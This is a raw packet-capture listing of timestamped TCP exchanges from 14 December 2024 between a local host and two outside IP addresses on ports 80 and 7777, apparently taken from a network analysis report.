Dec 14, 2024 23:58:45.339387894 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.340662956 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.340733051 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.341063976 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.341131926 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.342088938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.342170954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.342212915 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.342264891 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.343544960 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.343607903 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.343653917 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.343707085 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.344959974 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.345025063 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.345098972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.345148087 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.357944012 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.358011007 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.361623049 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:45.430643082 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.430821896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.430841923 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.430903912 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.431353092 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.431413889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.431493998 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.431556940 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.432818890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.432868958 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.432941914 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.432987928 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.434288025 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.434339046 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.434411049 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.434458971 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.435688972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.435744047 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.435826063 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.435873032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.437172890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.437222004 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.437277079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.437323093 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.438596010 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.438647032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.438716888 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.438765049 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.440012932 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.440066099 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.440149069 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.440196037 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.441450119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.441503048 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.441636086 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.441684961 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.442847013 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.442897081 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.442980051 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.443026066 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.444240093 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.444293022 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.444380045 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.444423914 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.445600033 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.445661068 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.445734024 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.445780993 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.446928978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.446979046 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.447048903 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.447097063 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.448227882 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.448277950 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.448348045 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.448395967 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.449497938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.449547052 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.449620008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.449668884 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.450795889 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.450846910 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.450948954 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.451011896 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.452028990 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.452120066 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.452162027 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.452208996 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.453255892 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.453310013 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.453470945 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.453520060 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.454477072 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.454533100 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.454603910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.454652071 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.455689907 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.455743074 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.455812931 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.455859900 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.456864119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.456917048 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.456985950 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.457041025 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.458058119 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.458128929 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.458199978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.458251953 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.459228992 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.459287882 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.459372044 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.459422112 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.460405111 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.460467100 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.460541010 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.460592031 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.461527109 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.461580992 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.461649895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.461695910 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.462654114 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.462703943 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.462846041 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.462899923 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.463809967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.463860035 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.463958979 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.464016914 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.464917898 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.464968920 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.465039968 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.465085030 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.466012955 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.466068029 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.466130972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.466200113 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.467120886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.467171907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.467242002 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.467303038 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.468215942 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.468266010 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.468355894 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.468415976 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.469288111 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.469338894 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.469409943 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.469458103 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.470356941 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.470407009 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.470491886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.470541954 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.471445084 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.471494913 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.471579075 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.471626043 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.472534895 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.472585917 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.472659111 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.472723007 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.473644972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.473697901 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.473773003 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.473823071 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.474688053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.474775076 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.474832058 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.474877119 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.475805044 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.475857019 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.475928068 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.475975037 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.476892948 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.476942062 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.477010965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.477057934 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.477972031 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.478023052 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.478097916 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.478147030 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.479053020 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.479104996 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.479161978 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.479207993 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.480113029 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.480165958 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.480251074 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.480297089 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.480958939 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.481005907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.481090069 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.481137991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.481347084 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:45.481520891 CET	49824	7777	192.168.2.4	87.120.127.228
Dec 14, 2024 23:58:45.481674910 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.481725931 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.481801033 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.481846094 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.482450008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.482497931 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.482582092 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.482630014 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.483228922 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.483354092 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.483361006 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.483411074 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.484061003 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.484112024 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.484143972 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.484190941 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.484791040 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.484841108 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.484911919 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.484956980 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.485567093 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.485615969 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.485698938 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.485745907 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.486346960 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.486396074 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.486468077 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.486514091 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.487114906 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.487162113 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.487232924 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.487278938 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.487941980 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.487992048 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.488063097 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.488116980 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.488697052 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.488746881 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.488816977 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.488862991 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.489424944 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.489474058 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.601306915 CET	7777	49824	87.120.127.228	192.168.2.4
Dec 14, 2024 23:58:45.622868061 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.622984886 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.623056889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.623056889 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.623202085 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.623260975 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.623408079 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.623462915 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.623955965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.624010086 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.624073982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.624135971 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.624756098 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.624814034 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.624902010 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.624952078 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.625535965 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.625596046 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.625667095 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.625721931 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.626327038 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.626383066 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.626425982 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.626480103 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.627067089 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.627115965 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.627202034 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.627259016 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.627846003 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.627906084 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.627976894 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.628032923 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.628654957 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.628710032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.628751993 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.628799915 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.629576921 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.629636049 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.629681110 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.629733086 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.630220890 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.630275965 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.630347967 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.630399942 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.630980968 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.631041050 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.631098032 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.631149054 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.631750107 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.631803989 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.631877899 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.631925106 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.632518053 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.632575035 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.632639885 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.632694006 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.633307934 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.633368015 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.633431911 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.633486032 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.634125948 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.634186029 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.634262085 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.634311914 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.634850979 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.634907007 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.634982109 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.635035992 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.635652065 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.635710001 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.635777950 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.635832071 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.636461973 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.636519909 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.636584997 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.636637926 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.637190104 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.637244940 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.637315035 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.637367964 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.637972116 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.638078928 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.638144970 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.638200045 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.638744116 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.638797998 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.638869047 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.638923883 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.639528990 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.639580011 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.639650106 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.639700890 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.640291929 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.640345097 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.640454054 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.640507936 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.641103029 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.641171932 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.641211033 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.641262054 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.641860008 CET	80	49863	185.215.113.16	192.168.2.4
Dec 14, 2024 23:58:45.641913891 CET	49863	80	192.168.2.4	185.215.113.16
Dec 14, 2024 23:58:45.642002106 CET	80	49863	185.215.113.16	192.168.2.4
